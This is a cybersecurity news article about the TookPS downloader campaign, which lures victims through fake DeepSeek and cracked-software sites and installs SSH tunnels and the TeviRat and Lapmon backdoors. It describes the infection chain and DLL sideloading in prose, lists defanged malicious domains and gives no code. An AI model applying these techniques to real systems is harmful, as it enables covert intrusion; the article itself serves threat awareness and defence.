Cybersecurity researchers have uncovered a large-scale malware campaign involving the TookPS downloader, which exploits both DeepSeek neural network tools and fraudulent websites mimicking legitimate software platforms.
This campaign targets individual users and organizations alike by disguising malware as popular applications such as UltraViewer, AutoCAD, and SketchUp.
These tools, widely used in business environments, serve as bait to lure victims into downloading malicious files.
The campaign’s infection chain begins with Trojan-Downloader.Win32.TookPS, which infiltrates systems by posing as legitimate software.
Once installed, the downloader connects to a command-and-control (C2) server embedded in its code to retrieve malicious PowerShell scripts.
These scripts initiate a series of actions, including downloading and executing additional malware strains like Backdoor.Win32.TeviRat and Backdoor.Win32.Lapmon.
The attackers leverage these backdoors to establish covert remote access and execute arbitrary commands on compromised devices.
Technical Details of the Attack
The TookPS malware employs a multi-stage infection process designed to maximize its reach and effectiveness.
Upon execution, the downloader retrieves base64-encoded PowerShell commands from its C2 server.
These commands sequentially download three scripts:
- The first script installs an SSH server using “sshd.exe,” along with its configuration file and RSA key for authentication. This creates a secure tunnel between the victim’s device and the attacker’s remote server, enabling full system access.
- The second script configures the SSH server with parameters such as remote server address, port number, and username, allowing attackers to control the infected system.
- The third script downloads additional malware strains, including Backdoor.Win32.TeviRat, which uses DLL sideloading to modify TeamViewer software for covert remote access.
The attackers also deploy Backdoor.Win32.Lapmon through unknown delivery methods.
Both backdoors communicate with separate C2 domains registered in early 2024, indicating a well-coordinated infrastructure behind this campaign.
Exploitation of Remote Desktop Tools
In addition to leveraging DeepSeek neural networks as lures, the attackers have targeted remote desktop tools such as UltraViewer by creating fraudulent websites offering cracked versions of these applications.
Domains like “ultraviewer[.]icu” and “autocad-cracked[.]com” were identified as part of this scheme. These sites mimic legitimate platforms to deceive users into downloading infected files.
The campaign uses advanced techniques such as DLL sideloading to modify legitimate software behavior while remaining undetected by users.
For instance, TeamViewer’s functionality is altered by placing malicious libraries alongside its executable files, granting attackers hidden access to compromised systems.
According to the Report, this campaign highlights the growing sophistication of cyberattacks targeting both personal and business-critical software.
By exploiting trusted tools like DeepSeek and popular applications, attackers can infiltrate networks with relative ease.
Once inside, they gain complete control over infected devices through SSH tunnels and backdoors.
To mitigate these risks, cybersecurity experts recommend avoiding pirated or unofficial software sources and implementing strict security policies within organizations.
Regular employee training on recognizing phishing attempts and malicious downloads is critical for maintaining vigilance against such threats.
The TookPS malware campaign serves as a stark reminder of the importance of robust cybersecurity measures in an increasingly interconnected digital landscape.
Find this Story Interesting! Follow us on LinkedIn, and X to Get More Instant Updates
